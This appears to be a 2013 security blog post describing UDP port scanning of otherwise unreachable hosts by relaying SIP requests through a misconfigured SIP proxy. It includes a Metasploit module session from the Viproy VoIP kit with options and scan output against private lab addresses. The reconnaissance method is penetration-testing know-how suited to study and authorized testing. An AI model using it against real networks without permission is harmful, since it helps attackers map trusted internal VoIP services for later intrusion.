May 7, 2013

UDP Port Scanning Using SIP Proxies

Port Scanning is an important phase of network mapping. All attacks and collected information rely on this phase. It's more important when discovering VoIP networks, because of UDP and IP based trust infrastructure. We can discover network services and SIP services via UDP scan, but we can detect only accessible servers. We need more information to execute SIP Trust based attacks. 

However a simple technique helps us to discover inaccessible SIP servers. SIP Proxies redirect SIP requests to host in SIP URI. When the request contains this header "sip:HOST:PORT", SIP Proxy try to redirect request to the target HOST and its PORT. SIP Proxy returns HOST's response if there is a response, otherwise time out error generated. We can use this configuration to scan inaccessible servers such as trusted servers, 3rd party servers and private gateway services. 

I developed a PoC scanning module to scan 3rd party servers via SIP Proxies. It's useful for UDP based SIP Server discovery. This module reports accessible servers, ports and SIP service software. I prepared a demo, this is a usage of scanning module to discover ports of 192.168.1.146 and 192.168.1.203. Vulnerable SIP Proxy is 192.168.1.145, we try to scan a port range of target hosts. 

Viproy VoIP Penetration and Exploitation Kit - Github Page
http://github.com/fozavci/viproy-voipkit

Viproy VoIP Penetration and Exploitation Kit - Homepage
http://www.viproy.com/voipkit



msf auxiliary(vsipportscan-options) > show options 

 Module options (auxiliary/scanner/sip/vsipportscan-options):

    Name                    Current Setting                            Required  Description
   ----                        ---------------                                --------  -----------
   CHOST                   192.168.1.100                              no        The local client address
   CPORT                   5091                                            no        The local client port
   RHOSTS                 192.168.1.146 192.168.1.203        yes       IP Range for UDP Port Scan
   RPORTS                 5060-5065                                    yes       Port Range for UDP Port Scan
   SIP_SERVER_IP       192.168.1.145                              yes       Vulnerable SIP Server IP
   SIP_SERVER_PORT  5060                                            yes       Vulnerable SIP Server Port
   THREADS               1                                                  yes       The number of concurrent threads

 msf auxiliary(vsipportscan-options) > set RPORTS 5058-5062
RPORTS => 5058-5062

 msf auxiliary(vsipportscan-options) > set VERBOSE true
VERBOSE => true

 msf auxiliary(vsipportscan-options) > run

 [*] Starting SIP Socket on 192.168.1.100:5091
[*] Sending Packet for 192.168.1.146:5058
[*] 192.168.1.146 5058 is Close/Filtered

 [*] Sending Packet for 192.168.1.146:5059
[*] 192.168.1.146 5059 is Close/Filtered

 [*] Sending Packet for 192.168.1.146:5060
[+] 192.168.1.146 5060 is Open
    Server : FPBX-2.11.0beta2(11.2.1)

 [*] Sending Packet for 192.168.1.146:5061
[*] 192.168.1.146 5061 is Close/Filtered

 [*] Sending Packet for 192.168.1.146:5062
[*] 192.168.1.146 5062 is Close/Filtered

 [*] Sending Packet for 192.168.1.203:5058
[*] 192.168.1.203 5058 is Close/Filtered

 [*] Sending Packet for 192.168.1.203:5059
[*] 192.168.1.203 5059 is Close/Filtered

 [*] Sending Packet for 192.168.1.203:5060
[+] 192.168.1.203 5060 is Open
    User-Agent : 3CXPhoneSystem 11.0.28976.849 (28862)

 [*] Sending Packet for 192.168.1.203:5061
[*] 192.168.1.203 5061 is Close/Filtered

 [*] Sending Packet for 192.168.1.203:5062
[*] 192.168.1.203 5062 is Close/Filtered

 [*] Stopping SIP Sockets...
[*] Auxiliary module execution completed


Gönderen zaman:
Etiketler: , , , ,
Subscribe to: Posts (Atom)